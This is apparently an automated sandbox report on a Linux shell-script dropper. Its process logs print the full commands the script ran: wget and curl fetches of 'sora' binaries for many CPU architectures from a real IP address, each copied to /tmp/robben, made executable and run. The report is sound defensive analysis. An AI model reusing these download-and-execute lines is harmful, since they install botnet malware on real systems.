Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-chdzjstbkk
Target 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
SHA256 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d

Threat Level: Shows suspicious behavior

The file 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:04

Reported

2024-10-18 02:06

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

2s

Max time network

128s

Command Line

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh N/A

Processes

/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:04

Reported

2024-10-18 02:06

Platform

debian9-armhf-20240729-en

Max time kernel

10s

Max time network

11s

Command Line

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh N/A

Processes

/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 02:04

Reported

2024-10-18 02:06

Platform

debian9-mipsbe-20240611-en

Max time kernel

85s

Max time network

88s

Command Line

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
